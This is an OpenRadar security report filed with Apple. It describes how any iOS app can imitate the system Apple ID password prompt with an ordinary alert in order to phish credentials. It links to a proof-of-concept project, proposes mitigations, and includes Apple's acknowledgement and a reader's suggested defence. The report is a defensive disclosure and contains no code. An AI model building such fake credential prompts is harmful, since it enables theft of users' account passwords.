Apple ID password prompts can easily be replicated, phishing attacks easily possible
| Originator: | igeek1 | ||
| Number: | rdar://34909608 | Date Originated: | 10-Oct-2017 09:54 AM |
| Status: | Open | Resolved: | |
| Product: | iCloud | Product Version: | iOS 11.0 |
| Classification: | Security | Reproducible: | Always |
Summary: This is a duplicate of radar #34885659 iOS asks the user for their iTunes password for many reasons, the most common ones are recently installed iOS operating system updates, or iOS app that are stuck while installing them. As a result, users are trained to just enter their Apple ID password whenever iOS prompts you to do so. However, those popups are not only shown on the lock screen, and the spring board, but also inside random apps, e.g. when they want to access iCloud, GameCenter or In-App-Purchases. This could easily be abused by any app, just by showing an `UIAlertController`, that looks exactly like the system dialog. Even users who know a lot about technology, have a hard time detecting that those alerts are phishing attacks. Steps to Reproduce: Check out the project at https://github.com/KrauseFx/steal.password, in particular the README, and the project itself in `M2GlobalState.m:222` Expected Results: Modern web browsers already do an excellent job protecting users from phishing attacks. Phishing within mobile apps is a rather new concept, and therefore still pretty unexplored. - System dialogs should be indicated as such - Dialogs from apps could contain the app icon on the top right of the dialog, to indicate the app is asking you - When asking for the Apple ID from the user, instead of asking for the password directly, open the Settings app - Fix the root of the problem, users shouldn't constantly be asked for their credentials. It doesn't affect all users, but I myself had this issue for many months, until it randomly disappeared. Actual Results: The dialog looks exactly like the system dialog, and users have no good way to check whether they're being phished. Version/Build: iOS 11 Version: iOS 11.0 Notes:
Comments
Please note: Reports posted here will not necessarily be seen by Apple. All problems should be submitted at bugreport.apple.com before they are posted here. Please only post information for Radars that you have filed yourself, and please do not include Apple confidential information in your posts. Thank you!
Message from product-security@apple.com
Hello Zev,
Thank you for filing this issue via Appleās bug reporting system. Apple takes every report of a potential security issue seriously.
We are already aware of this issue. Thank you for taking the time to pass it along to us.
Best regards, Scotty Apple Product Security
An alternative solution
Repost from the other radar: https://openradar.appspot.com/34885659
An alternative solution would be to show a screenshot of the springboard when the system is requesting AppleID credentials.
Each usre's home screen is relatively unique, which will be visible long enough, while they are entering their password, giving them time to register, subconsciously, that a fake home screen is showing.
The "springboard" could slide from the top, left or right and not overtake the whole screen, so users will still be able to resume their app when the system credentials are provided or denied.
Anything that is overlaid in any app, could be engineered by any designer, but unique and complex elements like a user's wallpaper and home-screen icons is nearly impossible to recreate.